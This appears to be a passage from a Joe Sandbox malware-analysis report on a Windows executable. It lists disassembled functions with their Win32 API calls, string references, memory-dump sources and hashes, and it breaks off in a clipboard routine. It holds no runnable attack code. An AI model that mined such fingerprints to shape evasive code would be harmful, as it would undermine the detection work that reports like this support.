SetMenu.USER32(?,00000000), ref: 00F577B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F57846
IsMenu.USER32 ref: 00F5785C
CreatePopupMenu.USER32 ref: 00F57866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F57893
DrawMenuBar.USER32 ref: 00F5789B

Strings

F, xrefs: 00F57887
0, xrefs: 00F57785

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: ac2e4497293988bfd9d8f74938935a625d8fdd459c69117c48892714792f4c82
Instruction ID: 818a5276b13735ac354c62789be65b9b91f820acfde6b6fce7bb8b27d5d50c8f
Opcode Fuzzy Hash: ac2e4497293988bfd9d8f74938935a625d8fdd459c69117c48892714792f4c82
Instruction Fuzzy Hash: F1414A74A01309EFDB10EF64E888A9A7BB5FF49321F280029EE16A7350C770AD14EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F57AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F57B83
CreateCompatibleDC.GDI32(00000000), ref: 00F57B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F57B9D
SelectObject.GDI32(00000000,00000000), ref: 00F57BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00F57BB0
DeleteDC.GDI32(00000000), ref: 00F57BB9
GetWindowLongW.USER32(?,000000EC), ref: 00F57BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F57BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F57BE3

Strings

static, xrefs: 00F57B1B

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: c888ac7a117ddbe2a9ce052d4e8c490ade97f3f7fbd4c8486424d0f581a0488f
Instruction ID: fde46c11ecf34f16fbf198f0a54c0358ca508f8ca236eaf1aedd9c468c0c9944
Opcode Fuzzy Hash: c888ac7a117ddbe2a9ce052d4e8c490ade97f3f7fbd4c8486424d0f581a0488f
Instruction Fuzzy Hash: 02318F32104218BFDF11AF64DC49FDB3B69FF49321F200215FA26A61A0CB75D814EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EF7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF706B

Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58

__gmtime64_s.LIBCMT ref: 00EF7104
__gmtime64_s.LIBCMT ref: 00EF713A
__gmtime64_s.LIBCMT ref: 00EF7157
__allrem.LIBCMT ref: 00EF71AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF71C9
__allrem.LIBCMT ref: 00EF71E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF71FE
__allrem.LIBCMT ref: 00EF7215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF7233
__invoke_watson.LIBCMT ref: 00EF72A4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: d87c30c75456d77c2afc289579905b31d60eea8fc5f372ce7219d8f68200ff4c
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 1A71E6B1A0471BABE7149E78CC41BBAB3E8AF10324F14522AF654F62C1EB74DE449790

Uniqueness

Uniqueness Score: -1.00%

Function 00F32CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F32CE9
GetMenuItemInfoW.USER32(00F97890,000000FF,00000000,00000030), ref: 00F32D4A
SetMenuItemInfoW.USER32 ref: 00F32D80
Sleep.KERNEL32(000001F4), ref: 00F32D92
GetMenuItemCount.USER32 ref: 00F32DD6
GetMenuItemID.USER32(?,00000000), ref: 00F32DF2
GetMenuItemID.USER32(?,-00000001), ref: 00F32E1C
GetMenuItemID.USER32(?,?), ref: 00F32E61
CheckMenuRadioItem.USER32 ref: 00F32EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F32EBB
SetMenuItemInfoW.USER32 ref: 00F32EDC

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 17303e8ef4fcdaa467881179be8149413be3fbd1caf03056672e299258f912c1
Instruction ID: 83904a2e107621fb84fec50994a21a272e46591fa36c6cf5a961ddf57664c0a3
Opcode Fuzzy Hash: 17303e8ef4fcdaa467881179be8149413be3fbd1caf03056672e299258f912c1
Instruction Fuzzy Hash: 9161D171900249AFDB50DF64CC89ABFBBB8EB40324F244059F851A7291DB71AD85FB20

Uniqueness

Uniqueness Score: -1.00%

Function 00F57548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F575CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F575CD
GetWindowLongW.USER32(?,000000F0), ref: 00F575F1
_memset.LIBCMT ref: 00F57602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F57614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F5768C

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 48c9b81a612af40302b7a2cca5a28bed505489632edc87b9f45a308587484cf1
Instruction ID: 1f7df7e2d92a37d72dbb108f19379a52fb7917252a6985d931a7fd227f91e5ea
Opcode Fuzzy Hash: 48c9b81a612af40302b7a2cca5a28bed505489632edc87b9f45a308587484cf1
Instruction Fuzzy Hash: A8618B75904308AFDB10EFA4DC81EEE77F8EB09710F24019AFA15A72A1D770AD45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F277B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F277DD
SafeArrayAllocData.OLEAUT32(?), ref: 00F27836
VariantInit.OLEAUT32(?), ref: 00F27848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00F27868
VariantCopy.OLEAUT32(?,?), ref: 00F278BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 00F278CF
VariantClear.OLEAUT32(?), ref: 00F278E4
SafeArrayDestroyData.OLEAUT32(?), ref: 00F278F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F278FA
VariantClear.OLEAUT32(?), ref: 00F2790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F27917

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6bd329b6d52499ad448d432509f3e9a41c15cdae851d5775d9f5798525d94de5
Instruction ID: f16224c0ad38160d09b9424b932b8c12173873454f7f18494f10b74a3f4c6d78
Opcode Fuzzy Hash: 6bd329b6d52499ad448d432509f3e9a41c15cdae851d5775d9f5798525d94de5
Instruction Fuzzy Hash: 52417135A0021D9FCB10EFA8DC489EEBBB9FF08310F108469E955A7261CB75A945DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F48AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

CoInitialize.OLE32 ref: 00F48AED
CoUninitialize.OLE32 ref: 00F48AF8
CoCreateInstance.OLE32(?,00000000,00000017,00F63BBC,?), ref: 00F48B58
IIDFromString.OLE32(?,?), ref: 00F48BCB
VariantInit.OLEAUT32(?), ref: 00F48C65
VariantClear.OLEAUT32(?), ref: 00F48CC6

Strings

Invalid parameter, xrefs: 00F48BE4
Failed to create object, xrefs: 00F48B63, 00F48C19
NULL Pointer assignment, xrefs: 00F48B9D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 7e70b63b34937bc68d32af0f1dd9dfef07709c7346412c2729fd8ec71e29b113
Instruction ID: 63608855f38dcddf3a0a7af1554c94fffd4610d88cbbe1e676da8a304ad1a0d4
Opcode Fuzzy Hash: 7e70b63b34937bc68d32af0f1dd9dfef07709c7346412c2729fd8ec71e29b113
Instruction Fuzzy Hash: 58619F716087119FC710DF24C889F6EBBE4EF84794F100849F981AB291CB74ED46EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F45E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F45E7E
inet_addr.WSOCK32(?,?,?), ref: 00F45EC3
gethostbyname.WSOCK32(?), ref: 00F45ECF
IcmpCreateFile.IPHLPAPI ref: 00F45EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F45F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F45F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F45FD8
WSACleanup.WSOCK32 ref: 00F45FDE

Strings

Ping, xrefs: 00F45F01

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 6dcbca8ab9c1a11702821609702e7bc6466f26086f5523f40dc51063ba514a53
Instruction ID: 41d8fb836f8c1e037b3e3a5c5f293cb4e53fa156cc2074460b58973b04b30bd6
Opcode Fuzzy Hash: 6dcbca8ab9c1a11702821609702e7bc6466f26086f5523f40dc51063ba514a53
Instruction Fuzzy Hash: CE5181716046019FD721EF25CC45B2ABBE4EF48B20F144969F965EB2A2DB70ED04EB42

Uniqueness

Uniqueness Score: -1.00%

Function 00F3BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F3BB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F3BB89
GetLastError.KERNEL32 ref: 00F3BB93
SetErrorMode.KERNEL32(00000000,READY), ref: 00F3BC00

Strings

INVALID, xrefs: 00F3BBD2
NOTREADY, xrefs: 00F3BBBF
READONLY, xrefs: 00F3BBCB
UNKNOWN, xrefs: 00F3BBB8
READY, xrefs: 00F3BBD9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: dc1732df844d5f7301da2d42b1b769fe0d319862169a9d21969d53edf3c58aed
Instruction ID: 9ca2b9c0a4d52b7edceade0b560b257f82356bf972c892d3d4142e9b8ce4cf13
Opcode Fuzzy Hash: dc1732df844d5f7301da2d42b1b769fe0d319862169a9d21969d53edf3c58aed
Instruction Fuzzy Hash: 2831C635A0020D9FCB10EF64CC65EAEF7B8EF84320F14816AE906E7295DF709942EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F29B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F29BCC
GetDlgCtrlID.USER32 ref: 00F29BD7
GetParent.USER32 ref: 00F29BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F29BF6
GetDlgCtrlID.USER32 ref: 00F29BFF
GetParent.USER32(?), ref: 00F29C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00F29C1E

Strings

ListBox, xrefs: 00F29B89
ComboBox, xrefs: 00F29B54

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 47b983834cc939bcd0dcf3c3f49e4d1deb10a965f4705b2527d4448bb242f24c
Instruction ID: e41f69288ccc1e258ad8ef2c3feb63dd22174167049aed6305cccd6113fb7e2a
Opcode Fuzzy Hash: 47b983834cc939bcd0dcf3c3f49e4d1deb10a965f4705b2527d4448bb242f24c
Instruction Fuzzy Hash: 4121F170D00118ABDF04AB61DC95EFEBBB8EF95310F200156F971A72A1EBB58954AB20

Uniqueness

Uniqueness Score: -1.00%

Function 00F29C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F29CB5
GetDlgCtrlID.USER32 ref: 00F29CC0
GetParent.USER32 ref: 00F29CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F29CDF
GetDlgCtrlID.USER32 ref: 00F29CE8
GetParent.USER32(?), ref: 00F29D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00F29D07

Strings

ListBox, xrefs: 00F29C74
ComboBox, xrefs: 00F29C3F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: e228e7e10e429ee1d2d037b7ff61bb7aba5945647ee14d41cce40bc1a9419919
Instruction ID: 5e943c4677816f20ded02ed05796c79c03861cb18af8e4d16bcbca16f4345db1
Opcode Fuzzy Hash: e228e7e10e429ee1d2d037b7ff61bb7aba5945647ee14d41cce40bc1a9419919
Instruction Fuzzy Hash: 8321F575D40119BFDF00AB61DC85EFEBBB9EF94300F200051F961A71A1DBB58954EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00F29D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00F29D27
GetClassNameW.USER32 ref: 00F29D3C
_wcscmp.LIBCMT ref: 00F29D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F29DC9

Strings

largeicons, xrefs: 00F29D5D
smallicons, xrefs: 00F29D91
SHELLDLL_DefView, xrefs: 00F29D48
list, xrefs: 00F29DAB
details, xrefs: 00F29D77

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 7379ea85c74a6b97adbd779af2e436ae26aca12ec332073891dce57ee1d1d145
Instruction ID: 82f53c84c74972415210010fe3883186061788626534266ec83d081b7f3e8ef2
Opcode Fuzzy Hash: 7379ea85c74a6b97adbd779af2e436ae26aca12ec332073891dce57ee1d1d145
Instruction Fuzzy Hash: C211E77764D32ABAF6102620FC06DE7739CDB05320F601017FA10A60D1FED6A9517675

Uniqueness

Uniqueness Score: -1.00%

Function 00F48F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F48FC1
CoInitialize.OLE32(00000000), ref: 00F48FEE
CoUninitialize.OLE32 ref: 00F48FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 00F490F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00F49225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F63BDC), ref: 00F49259
CoGetObject.OLE32(?,00000000,00F63BDC,?), ref: 00F4927C
SetErrorMode.KERNEL32(00000000), ref: 00F4928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F4930F
VariantClear.OLEAUT32(?), ref: 00F4931F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 4e11409eeab6182daa8ec24b73d02398c005d99b9519d937a1ed067695c0ab3b
Instruction ID: 88d378fcd8c8ea3fb54a56c24ab21daa5ff1bcd23891df723901da895b7443ef
Opcode Fuzzy Hash: 4e11409eeab6182daa8ec24b73d02398c005d99b9519d937a1ed067695c0ab3b
Instruction Fuzzy Hash: 66C14571608305AFD700DF68C88492BBBE9FF89348F10491DF98A9B251DBB1ED06DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F319CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F319EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A03
GetWindowThreadProcessId.USER32(00000000), ref: 00F31A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F31A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F30A67,?,00000001), ref: 00F31ABB

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: a712d29fc51a113b7b37fdfc218f29422e8dbb21083123945fb31296da7dc5d8
Instruction ID: 0ec95abab49f283ecc126f669fcc6e0679fb19b22cd7979b235af8025ef04d37
Opcode Fuzzy Hash: a712d29fc51a113b7b37fdfc218f29422e8dbb21083123945fb31296da7dc5d8
Instruction Fuzzy Hash: 26318F71912208AFDF209F54DC44B6A77AABB5637AF208116FD00C6290DBB99D40BF60

Uniqueness

Uniqueness Score: -1.00%

Function 00F44830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00F44857
EmptyClipboard.USER32 ref: 00F4485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00F44872
CloseClipboard.USER32 ref: 00F44911

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
